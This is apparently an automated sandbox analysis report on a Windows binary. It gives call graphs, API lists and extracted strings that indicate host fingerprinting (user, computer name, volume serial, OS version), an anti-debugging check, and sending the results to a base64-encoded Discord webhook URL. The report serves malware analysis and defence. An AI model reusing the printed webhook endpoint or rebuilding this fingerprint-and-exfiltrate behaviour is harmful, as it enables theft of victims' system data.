calls 4492->4495 4497 7ff65e1f3eb0 4492->4497 4493->4492 4494->4492 4496 7ff65e1f427e ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 4495->4496 4496->4497 4498 7ff65e1fd9d0 Concurrency::cancel_current_task 8 API calls 4497->4498 4499 7ff65e1f423d 4498->4499 6137 7ff65e1f342c 6138 7ff65e1f343a ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N ?uncaught_exceptions@std@ 6137->6138 6139 7ff65e1f3474 6138->6139 6140 7ff65e1f346a ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 6138->6140 6140->6139 6062 7ff65e1f9fac 6063 7ff65e1fbc00 12 API calls 6062->6063 6064 7ff65e1f9fb1 6063->6064 6145 7ff65e1fec28 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N 4442 7ff65e1f4082 GetCurrentProcess CheckRemoteDebuggerPresent 4443 7ff65e1f41e1 4442->4443 4446 7ff65e1f3eb0 4443->4446 4458 7ff65e1f4530 4443->4458 4449 7ff65e1fd9d0 4446->4449 4450 7ff65e1fd9d9 4449->4450 4451 7ff65e1fe084 IsProcessorFeaturePresent 4450->4451 4452 7ff65e1f423d 4450->4452 4453 7ff65e1fe09c 4451->4453 4472 7ff65e1fe158 RtlCaptureContext 4453->4472 4463 7ff65e1f4560 ?good@ios_base@std@ 4458->4463 4460 7ff65e1f45e1 4462 7ff65e1f45eb ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N ?uncaught_exceptions@std@ 4460->4462 4465 7ff65e1f463d ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J 4460->4465 4470 7ff65e1f4615 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 4460->4470 4461 7ff65e1f45b3 4461->4460 4466 7ff65e1f45c9 ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12 ?good@ios_base@std@ 4461->4466 4467 7ff65e1f46cd ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 4462->4467 4468 7ff65e1f427e ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 4462->4468 4463->4460 4463->4461 4465->4462 4469 7ff65e1f465a 4465->4469 4466->4460 4467->4468 4468->4446 4469->4462 4471 7ff65e1f4665 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 4469->4471 4470->4460 4470->4462 4471->4462 4471->4469 4473 7ff65e1fe172 RtlLookupFunctionEntry 4472->4473 4474 7ff65e1fe0af 4473->4474 4475 7ff65e1fe188 RtlVirtualUnwind 4473->4475 4476 7ff65e1fe050 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 4474->4476 4475->4473 4475->4474 6146 7ff65e1f1c00 6147 7ff65e1f2870 _Receive_impl 4 API calls 6146->6147 6148 7ff65e1f1c42 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 6147->6148 6149 7ff65e1f2c00 ??1?$codecvt@_WDU_Mbstatet@@@std@@MEAA 6150 7ff65e1f2c24 6149->6150 6151 7ff65e1f2c31 6149->6151 6152 7ff65e1fda34 _Receive_impl free 6150->6152 6152->6151 6322 7ff65e1f1080 __std_exception_destroy 6323 7ff65e1f10b5 6322->6323 6324 7ff65e1f10a8 6322->6324 6325 7ff65e1fda34 _Receive_impl free 6324->6325 6325->6323 6326 7ff65e1f2c80 6327 7ff65e1f2870 _Receive_impl 4 API calls 6326->6327 6328 7ff65e1f2c94 6327->6328 6329 7ff65e1f2ca6 6328->6329 6330 7ff65e1fda34 _Receive_impl free 6328->6330 6330->6329 6153 7ff65e1fdc00 6157 7ff65e1fe4c8 SetUnhandledExceptionFilter 6153->6157 6158 7ff65e1fd600 6159 7ff65e1fd60c 6158->6159 6164 7ff65e1faee0 6158->6164 6160 7ff65e1faf4d 6161 7ff65e1faf14 6162 7ff65e1faf45 6161->6162 6165 7ff65e1faf65 _invalid_parameter_noinfo_noreturn 6161->6165 6166 7ff65e1fda34 _Receive_impl free 6162->6166 6163 7ff65e1f7080 20 API calls 6163->6164 6164->6160 6164->6161 6164->6163 6166->6160 6167 7ff65e1fae00 6168 7ff65e1f34a0 8 API calls 6167->6168 6169 7ff65e1fae32 6168->6169 6392 7ff65e1fc300 6393 7ff65e1fc350 6392->6393 6394 7ff65e1fc34b 6392->6394 6396 7ff65e1f3200 13 API calls 6393->6396 6395 7ff65e1fb6a0 9 API calls 6394->6395 6395->6393 6397 7ff65e1fc369 6396->6397 6398 7ff65e1f3200 13 API calls 6397->6398 6399 7ff65e1fc382 6398->6399 6400 7ff65e1f9cff 6401 7ff65e1f9d7d _dsign 6400->6401 6402 7ff65e1f9d25 6400->6402 6403 7ff65e1f9d91 6401->6403 6403->6402 6405 7ff65e1f5e40 6403->6405 6406 7ff65e1f5e5b 6405->6406 6407 7ff65e1f5e98 6405->6407 6406->6407 6408 7ff65e1f5e60 memset 6406->6408 6409 7ff65e1f5ed1 6407->6409 6410 7ff65e1f5ea1 6407->6410 6408->6402 6411 7ff65e1f5f16 6409->6411 6413 7ff65e1f5ed6 memmove memset 6409->6413 6410->6411 6412 7ff65e1f5ea6 memmove 6410->6412 6414 7ff65e1f5f1f memmove 6411->6414 6415 7ff65e1f5f3c 6411->6415 6412->6415 6413->6415 6414->6415 6415->6402 6331 7ff65e1ff47e 6332 7ff65e1f4530 9 API calls 6331->6332 6333 7ff65e1ff49f 6332->6333 6334 7ff65e1f4530 9 API calls 6333->6334 6335 7ff65e1ff4ba ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 6334->6335 4489 7ff65e1f4710 ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADD ?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@D ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12 6337 7ff65e1f1c90 6340 7ff65e1f1ccb 6337->6340 6338 7ff65e1fd9d0 Concurrency::cancel_current_task 8 API calls 6339 7ff65e1f1dea 6338->6339 6340->6338 6416 7ff65e1f5910 __std_exception_destroy __std_exception_destroy 6417 7ff65e1f5510 6420 7ff65e1f1010 6417->6420 6419 7ff65e1f5535 __stdio_common_vsprintf 6420->6419 6069 7ff65e1fd990 6072 7ff65e1fd890 6069->6072 6073 7ff65e1fd8b7 _CxxThrowException 6072->6073 6425 7ff65e1fd510 6426 7ff65e1fd51e 6425->6426 6427 7ff65e1fd528 6425->6427 6428 7ff65e1fda34 _Receive_impl free 6426->6428 6428->6427 5924 7ff65e1f3f89 QueryPerformanceFrequency QueryPerformanceCounter SleepEx QueryPerformanceCounter 5925 7ff65e1f41e1 5924->5925 5926 7ff65e1f4530 9 API calls 5925->5926 5928 7ff65e1f3eb0 5925->5928 5927 7ff65e1f427e ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5926->5927 5927->5928 5929 7ff65e1fd9d0 Concurrency::cancel_current_task 8 API calls 5928->5929 5930 7ff65e1f423d 5929->5930 6350 7ff65e1ffa88 6351 7ff65e1ffa90 6350->6351 6352 7ff65e1ffad9 6351->6352 6353 7ff65e1ffac4 free 6351->6353 6353->6351 6429 7ff65e1feb06 6430 7ff65e1feb31 6429->6430 6431 7ff65e1feb19 ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 6429->6431 6431->6430

                                        Executed Functions

                                        Function 00007FF65E1F70A0 Relevance: 81.5, APIs: 27, Strings: 19, Instructions: 981COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 7ff65e1f70a0-7ff65e1f7125 call 7ff65e1f34a0 call 7ff65e1f6000 5 7ff65e1f715c-7ff65e1f74af call 7ff65e1fa640 call 7ff65e1fd9f0 call 7ff65e1f34a0 call 7ff65e1f6440 call 7ff65e1f8e00 * 3 call 7ff65e1fda68 * 2 call 7ff65e1fa640 call 7ff65e1fda68 call 7ff65e1fa640 _Xtime_get_ticks memset ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ _gmtime64 0->5 6 7ff65e1f7127-7ff65e1f7139 0->6 35 7ff65e1f74b0-7ff65e1f74bb 5->35 7 7ff65e1f713b-7ff65e1f714e 6->7 8 7ff65e1f7157 call 7ff65e1fda34 6->8 7->8 10 7ff65e1f7150-7ff65e1f7156 _invalid_parameter_noinfo_noreturn 7->10 8->5 10->8 35->35 36 7ff65e1f74bd-7ff65e1f751c call 7ff65e1fb100 35->36 39 7ff65e1f751e-7ff65e1f752c 36->39 40 7ff65e1f754f-7ff65e1f7552 36->40 39->40 41 7ff65e1f752e-7ff65e1f754d 39->41 42 7ff65e1f7554-7ff65e1f7562 40->42 43 7ff65e1f7582-7ff65e1f7587 40->43 44 7ff65e1f758c-7ff65e1f758f 41->44 42->43 45 7ff65e1f7564-7ff65e1f7580 42->45 43->44 46 7ff65e1f75a1-7ff65e1f762b call 7ff65e1fa640 call 7ff65e1fd9f0 call 7ff65e1f34a0 call 7ff65e1fc6e0 44->46 47 7ff65e1f7591-7ff65e1f759b call 7ff65e1f30a0 44->47 45->44 58 7ff65e1f762d-7ff65e1f7645 call 7ff65e1fd9f0 46->58 59 7ff65e1f7649-7ff65e1f764c 46->59 47->46 58->59 61 7ff65e1f7db4-7ff65e1f7dfa call 7ff65e1fa0b0 call 7ff65e1fb3b0 call 7ff65e1fb470 _CxxThrowException 59->61 62 7ff65e1f7652-7ff65e1f766a 59->62 86 7ff65e1f7dfb call 7ff65e1f11c0 61->86 65 7ff65e1f766c-7ff65e1f767b 62->65 66 7ff65e1f76ad-7ff65e1f778f call 7ff65e1f34a0 call 7ff65e1fc6e0 call 7ff65e1fa640 call 7ff65e1f8ae0 62->66 69 7ff65e1f767d-7ff65e1f7685 call 7ff65e1fcb90 65->69 70 7ff65e1f7687-7ff65e1f768a 65->70 92 7ff65e1f7792-7ff65e1f7795 66->92 69->66 73 7ff65e1f768c 70->73 74 7ff65e1f76a9 70->74 78 7ff65e1f7690-7ff65e1f76a7 call 7ff65e1f9f80 73->78 74->66 78->74 91 7ff65e1f7e00-7ff65e1f7e4c call 7ff65e1f1120 call 7ff65e1fe000 86->91 120 7ff65e1f7e52-7ff65e1f7ebe call 7ff65e1f34a0 GetUserNameW call 7ff65e1f21a0 91->120 121 7ff65e1f83b8-7ff65e1f83df call 7ff65e1fd9d0 91->121 94 7ff65e1f7875-7ff65e1f7889 92->94 95 7ff65e1f779b-7ff65e1f77a3 92->95 94->86 97 7ff65e1f788f-7ff65e1f78c6 94->97 98 7ff65e1f77d4-7ff65e1f77d8 95->98 99 7ff65e1f77a5-7ff65e1f77d2 call 7ff65e1f3200 95->99 101 7ff65e1f78c8-7ff65e1f78d2 97->101 102 7ff65e1f7946-7ff65e1f7a54 memmove call 7ff65e1f3200 * 2 97->102 104 7ff65e1f77da-7ff65e1f7807 call 7ff65e1f3200 98->104 105 7ff65e1f7809-7ff65e1f780c 98->105 99->92 107 7ff65e1f78d4-7ff65e1f78e1 101->107 108 7ff65e1f7900-7ff65e1f7913 101->108 139 7ff65e1f7a8b-7ff65e1f7a9f 102->139 140 7ff65e1f7a56-7ff65e1f7a68 102->140 104->92 112 7ff65e1f7850-7ff65e1f7870 call 7ff65e1f35a0 105->112 113 7ff65e1f780e-7ff65e1f784b 105->113 115 7ff65e1f78e5-7ff65e1f78f0 call 7ff65e1fd9f0 107->115 117 7ff65e1f7915-7ff65e1f7918 108->117 118 7ff65e1f791a-7ff65e1f7921 108->118 112->92 113->92 137 7ff65e1f7932-7ff65e1f7938 _invalid_parameter_noinfo_noreturn 115->137 138 7ff65e1f78f2-7ff65e1f78fe 115->138 125 7ff65e1f7941 117->125 126 7ff65e1f7923-7ff65e1f792a 118->126 127 7ff65e1f7939-7ff65e1f793e call 7ff65e1fd9f0 118->127 148 7ff65e1f7ec0-7ff65e1f7ec9 120->148 149 7ff65e1f7ecb-7ff65e1f7f50 call 7ff65e1f2cc0 call 7ff65e1f20b0 call 7ff65e1f34a0 GetComputerNameW call 7ff65e1f21a0 120->149 125->102 126->91 133 7ff65e1f7930 126->133 127->125 133->115 137->127 138->125 146 7ff65e1f7aa1-7ff65e1f7ab3 139->146 147 7ff65e1f7ad6-7ff65e1f7b63 call 7ff65e1f61c0 call 7ff65e1f4530 call 7ff65e1f3ac0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z 139->147 144 7ff65e1f7a6a-7ff65e1f7a7d 140->144 145 7ff65e1f7a86 call 7ff65e1fda34 140->145 144->145 151 7ff65e1f7a7f-7ff65e1f7a85 _invalid_parameter_noinfo_noreturn 144->151 145->139 153 7ff65e1f7ab5-7ff65e1f7ac8 146->153 154 7ff65e1f7ad1 call 7ff65e1fda34 146->154 168 7ff65e1f7b65-7ff65e1f7b7a 147->168 169 7ff65e1f7b9d-7ff65e1f7bc5 147->169 148->148 148->149 188 7ff65e1f7f52-7ff65e1f7f5b 149->188 189 7ff65e1f7f5d-7ff65e1f8027 call 7ff65e1f2cc0 call 7ff65e1f20b0 call 7ff65e1f34a0 call 7ff65e1f1450 call 7ff65e1f34a0 GetVolumeInformationW 149->189 151->145 153->154 158 7ff65e1f7aca-7ff65e1f7ad0 _invalid_parameter_noinfo_noreturn 153->158 154->147 158->154 171 7ff65e1f7b7c-7ff65e1f7b8f 168->171 172 7ff65e1f7b98 call 7ff65e1fda34 168->172 173 7ff65e1f7bff-7ff65e1f7c1c 169->173 174 7ff65e1f7bc7-7ff65e1f7bdc 169->174 171->172 178 7ff65e1f7b91-7ff65e1f7b97 _invalid_parameter_noinfo_noreturn 171->178 172->169 175 7ff65e1f7c1e-7ff65e1f7c33 173->175 176 7ff65e1f7c56-7ff65e1f7c7e 173->176 180 7ff65e1f7bde-7ff65e1f7bf1 174->180 181 7ff65e1f7bfa call 7ff65e1fda34 174->181 184 7ff65e1f7c35-7ff65e1f7c48 175->184 185 7ff65e1f7c51 call 7ff65e1fda34 175->185 186 7ff65e1f7c80-7ff65e1f7c95 176->186 187 7ff65e1f7cb8-7ff65e1f7d42 call 7ff65e1f2870 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ call 7ff65e1fa640 176->187 178->172 180->181 182 7ff65e1f7bf3-7ff65e1f7bf9 _invalid_parameter_noinfo_noreturn 180->182 181->173 182->181 184->185 191 7ff65e1f7c4a-7ff65e1f7c50 _invalid_parameter_noinfo_noreturn 184->191 185->176 193 7ff65e1f7cb3 call 7ff65e1fda34 186->193 194 7ff65e1f7c97-7ff65e1f7caa 186->194 205 7ff65e1f7d44-7ff65e1f7d59 187->205 206 7ff65e1f7d7d-7ff65e1f7db3 call 7ff65e1fd9d0 187->206 188->188 188->189 219 7ff65e1f808e-7ff65e1f80a7 189->219 220 7ff65e1f8029-7ff65e1f805f call 7ff65e1f3280 call 7ff65e1f21a0 189->220 191->185 193->187 194->193 197 7ff65e1f7cac-7ff65e1f7cb2 _invalid_parameter_noinfo_noreturn 194->197 197->193 208 7ff65e1f7d5b-7ff65e1f7d6e 205->208 209 7ff65e1f7d77-7ff65e1f7d7c call 7ff65e1fda34 205->209 208->209 212 7ff65e1f7d70-7ff65e1f7d76 _invalid_parameter_noinfo_noreturn 208->212 209->206 212->209 221 7ff65e1f80b0-7ff65e1f810a call 7ff65e1f34a0 memset GetVersionExW 219->221 222 7ff65e1f80ab call 7ff65e1f34a0 219->222 234 7ff65e1f8061-7ff65e1f806a 220->234 235 7ff65e1f806c-7ff65e1f808c call 7ff65e1f2cc0 call 7ff65e1f20b0 220->235 228 7ff65e1f8113-7ff65e1f8133 GetModuleHandleW GetProcAddress 221->228 229 7ff65e1f810c-7ff65e1f810e 221->229 222->221 231 7ff65e1f8135-7ff65e1f8137 228->231 232 7ff65e1f8139-7ff65e1f818c call 7ff65e1f1390 228->232 233 7ff65e1f8191-7ff65e1f8193 229->233 231->233 232->233 236 7ff65e1f8195-7ff65e1f81b1 call 7ff65e1f21a0 233->236 237 7ff65e1f81e3-7ff65e1f8205 233->237 234->234 234->235 235->221 250 7ff65e1f81b3-7ff65e1f81bc 236->250 251 7ff65e1f81be-7ff65e1f81e1 call 7ff65e1f2cc0 call 7ff65e1f20b0 236->251 239 7ff65e1f8211-7ff65e1f82e8 call 7ff65e1f34a0 call 7ff65e1f1780 call 7ff65e1f85b0 call 7ff65e1fda68 call 7ff65e1f34a0 call 7ff65e1f70a0 237->239 240 7ff65e1f820c call 7ff65e1f34a0 237->240 266 7ff65e1f82ed-7ff65e1f8303 239->266 240->239 250->250 250->251 251->239 267 7ff65e1f8305-7ff65e1f8310 266->267 268 7ff65e1f8351-7ff65e1f835c 266->268 271 7ff65e1f8342-7ff65e1f834a 267->271 272 7ff65e1f8312-7ff65e1f8326 267->272 269 7ff65e1f835e-7ff65e1f8372 268->269 270 7ff65e1f839d-7ff65e1f83b3 call 7ff65e1f9ea0 268->270 273 7ff65e1f8374-7ff65e1f8387 269->273 274 7ff65e1f8390-7ff65e1f8395 call 7ff65e1fda34 269->274 270->121 271->268 276 7ff65e1f833d call 7ff65e1fda34 272->276 277 7ff65e1f8328-7ff65e1f833b 272->277 273->274 278 7ff65e1f8389-7ff65e1f838f _invalid_parameter_noinfo_noreturn 273->278 274->270 276->271 277->276 277->278 278->274
                                        APIs
                                          • Part of subcall function 00007FF65E1F34A0: memmove.VCRUNTIME140(?,?,?,?,00007FF65E1F14B3), ref: 00007FF65E1F34D8
                                          • Part of subcall function 00007FF65E1F6000: CryptStringToBinaryA.CRYPT32 ref: 00007FF65E1F6065
                                          • Part of subcall function 00007FF65E1F6000: memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,System,?), ref: 00007FF65E1F60A6
                                          • Part of subcall function 00007FF65E1F6000: CryptStringToBinaryA.CRYPT32 ref: 00007FF65E1F60DF
                                          • Part of subcall function 00007FF65E1F6000: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,System,?), ref: 00007FF65E1F6141
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1F7150
                                        • _Xtime_get_ticks.MSVCP140 ref: 00007FF65E1F7397
                                        • memset.VCRUNTIME140 ref: 00007FF65E1F73D6
                                        • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF65E1F7401
                                        • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140 ref: 00007FF65E1F7423
                                        • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF65E1F7466
                                        • _gmtime64.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF65E1F7493
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1F7932
                                        • memmove.VCRUNTIME140 ref: 00007FF65E1F798D
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1F7A7F
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1F7ACA
                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF65E1F7B50
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1F7B91
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1F7BF3
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1F7C4A
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1F7CAC
                                        • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF65E1F7D0B
                                        • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF65E1F7D19
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1F7D70
                                          • Part of subcall function 00007FF65E1FB470: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1FB53E
                                          • Part of subcall function 00007FF65E1FB470: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1FB58D
                                          • Part of subcall function 00007FF65E1FB470: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF65E1FB5CC
                                        • _CxxThrowException.VCRUNTIME140 ref: 00007FF65E1F7DF5
                                          • Part of subcall function 00007FF65E1F11C0: ?_Xlength_error@std@@YAXPEBD@Z.MSVCP140 ref: 00007FF65E1F11CB
                                          • Part of subcall function 00007FF65E1F34A0: memmove.VCRUNTIME140(?,?,?,?,00007FF65E1F14B3), ref: 00007FF65E1F3579
                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF65E1F7E00
                                        • GetUserNameW.ADVAPI32 ref: 00007FF65E1F7E9D
                                        • GetComputerNameW.KERNEL32 ref: 00007FF65E1F7F2E
                                        • GetVolumeInformationW.KERNELBASE ref: 00007FF65E1F801F
                                        • memset.VCRUNTIME140 ref: 00007FF65E1F80EC
                                        • GetVersionExW.KERNEL32 ref: 00007FF65E1F8102
                                          • Part of subcall function 00007FF65E1F3280: __stdio_common_vswprintf_s.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF65E1F32C3
                                          • Part of subcall function 00007FF65E1F21A0: ?_Init@locale@std@@CAPEAV_Locimp@12@_N@Z.MSVCP140 ref: 00007FF65E1F21C0
                                          • Part of subcall function 00007FF65E1F21A0: ??0?$codecvt@_WDU_Mbstatet@@@std@@QEAA@_K@Z.MSVCP140 ref: 00007FF65E1F2216
                                          • Part of subcall function 00007FF65E1F21A0: ?_New_Locimp@_Locimp@locale@std@@CAPEAV123@AEBV123@@Z.MSVCP140 ref: 00007FF65E1F2232
                                          • Part of subcall function 00007FF65E1F21A0: ??Bid@locale@std@@QEAA_KXZ.MSVCP140 ref: 00007FF65E1F2242
                                          • Part of subcall function 00007FF65E1F21A0: ?_Addfac@_Locimp@locale@std@@AEAAXPEAVfacet@23@_K@Z.MSVCP140 ref: 00007FF65E1F2251
                                          • Part of subcall function 00007FF65E1F21A0: ??4?$_Yarn@D@std@@QEAAAEAV01@PEBD@Z.MSVCP140 ref: 00007FF65E1F2265
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$U?$char_traits@$D@std@@@std@@$V01@memmovememset$BinaryCryptLocimp@locale@std@@NameString$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??0?$codecvt@_??1?$basic_ios@??1?$basic_iostream@??4?$_??6?$basic_ostream@Addfac@_Bid@locale@std@@ComputerConcurrency::cancel_current_taskD@std@@D@std@@@1@@ExceptionInformationInit@locale@std@@Locimp@12@_Locimp@_Mbstatet@@@std@@New_ThrowUserV01@@V123@V123@@V?$basic_streambuf@VersionVfacet@23@_VolumeXlength_error@std@@Xtime_get_ticksYarn@__stdio_common_vswprintf_s_gmtime64
                                        • String ID: -d "$%08X$%Y-%m-%dT%H:%M:%S.000Z$Application$C:\$Drives$New client$Security$System$Webhook sent. Response: $aHR0cHM6Ly9kaXNjb3JkLmNvbS9hcGkvd2ViaG9va3MvMTMyMTMyODYwMjc5MjQ2MDMzMC9ROUNRTVVxaFBtbkxBOFlDR0ZpV2NOMXFzbWQ4U3pFekhWNVJjRnJJdVl4OFVXVTJiU0czZmR3NGdyMUM3QVZoSlFobQ==$embeds$h$ip address$local user$product version$serial number$system name$timestamp
                                        • API String ID: 2975285854-287537819
                                        • Opcode ID: 3e4def7a3932eda77ec408c44bbf75faeee4343490c5b6f44898434bce0f04f2
                                        • Instruction ID: 2b96ea6ee1781134b0a5c494a4b95b59a245e85fffd4bb4443e61bbc6ed87c7c
                                        • Opcode Fuzzy Hash: 3e4def7a3932eda77ec408c44bbf75faeee4343490c5b6f44898434bce0f04f2
                                        • Instruction Fuzzy Hash: 5CB2B372A18BC281EF70CB24E5503EE7361FBA5394F445232EAAD92A99DF7CD184C750
                                        Function 00007FF65E1F4990 Relevance: 58.3, APIs: 28, Strings: 5, Instructions: 546memorycomCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 282 7ff65e1f4990-7ff65e1f4b27 CoInitializeEx CoCreateInstance VariantInit * 4 VariantClear * 4 call 7ff65e1fd9f0 286 7ff65e1f4b5b 282->286 287 7ff65e1f4b29-7ff65e1f4b53 SysAllocString 282->287 290 7ff65e1f4b5e-7ff65e1f4b66 286->290 288 7ff65e1f51b4-7ff65e1f51be call 7ff65e1fd830 287->288 289 7ff65e1f4b59 287->289 297 7ff65e1f51bf-7ff65e1f51c9 call 7ff65e1fd830 288->297 289->290 292 7ff65e1f4b6c-7ff65e1f4b89 290->292 293 7ff65e1f51eb-7ff65e1f51f5 call 7ff65e1fd830 290->293 301 7ff65e1f4bbb-7ff65e1f4be2 call 7ff65e1fd9f0 292->301 302 7ff65e1f4b8b-7ff65e1f4b91 292->302 299 7ff65e1f51f6-7ff65e1f5200 call 7ff65e1fd830 293->299 311 7ff65e1f51ca-7ff65e1f51d4 call 7ff65e1fd830 297->311 316 7ff65e1f4be4-7ff65e1f4c0e SysAllocString 301->316 317 7ff65e1f4c16 301->317 303 7ff65e1f4b93-7ff65e1f4b99 SysFreeString 302->303 304 7ff65e1f4b9c-7ff65e1f4ba3 302->304 303->304 308 7ff65e1f4ba5-7ff65e1f4baa call 7ff65e1fda34 304->308 309 7ff65e1f4bae-7ff65e1f4bb6 call 7ff65e1fda34 304->309 308->309 309->301 322 7ff65e1f51d5-7ff65e1f51df call 7ff65e1fd830 311->322 316->297 320 7ff65e1f4c14 316->320 321 7ff65e1f4c19-7ff65e1f4c21 317->321 320->321 321->293 323 7ff65e1f4c27-7ff65e1f4c45 321->323 329 7ff65e1f51e0-7ff65e1f51ea call 7ff65e1fd830 322->329 327 7ff65e1f4c77-7ff65e1f4c7a 323->327 328 7ff65e1f4c47-7ff65e1f4c4d 323->328 332 7ff65e1f4c7c-7ff65e1f4c86 327->332 333 7ff65e1f4cd6-7ff65e1f4d1c call 7ff65e1fd9f0 327->333 330 7ff65e1f4c4f-7ff65e1f4c55 SysFreeString 328->330 331 7ff65e1f4c58-7ff65e1f4c5f 328->331 329->293 330->331 335 7ff65e1f4c61-7ff65e1f4c66 call 7ff65e1fda34 331->335 336 7ff65e1f4c6a-7ff65e1f4c72 call 7ff65e1fda34 331->336 332->333 337 7ff65e1f4c88-7ff65e1f4cb4 CoUninitialize call 7ff65e1fd9d0 332->337 349 7ff65e1f4d50 333->349 350 7ff65e1f4d1e-7ff65e1f4d48 SysAllocString 333->350 335->336 336->327 354 7ff65e1f4cb9-7ff65e1f4cd5 337->354 353 7ff65e1f4d53-7ff65e1f4d5b 349->353 350->311 352 7ff65e1f4d4e 350->352 352->353 353->293 355 7ff65e1f4d61-7ff65e1f4d76 353->355 357 7ff65e1f4da8-7ff65e1f4ee6 355->357 358 7ff65e1f4d78-7ff65e1f4d7e 355->358 380 7ff65e1f4eeb-7ff65e1f4f00 call 7ff65e1fd9f0 357->380 381 7ff65e1f4ee8 357->381 359 7ff65e1f4d80-7ff65e1f4d86 SysFreeString 358->359 360 7ff65e1f4d89-7ff65e1f4d90 358->360 359->360 361 7ff65e1f4d92-7ff65e1f4d97 call 7ff65e1fda34 360->361 362 7ff65e1f4d9b-7ff65e1f4da3 call 7ff65e1fda34 360->362 361->362 362->357 384 7ff65e1f4f35 380->384 385 7ff65e1f4f02-7ff65e1f4f28 SysAllocString 380->385 381->380 387 7ff65e1f4f38-7ff65e1f4f40 384->387 386 7ff65e1f4f2a-7ff65e1f4f2d 385->386 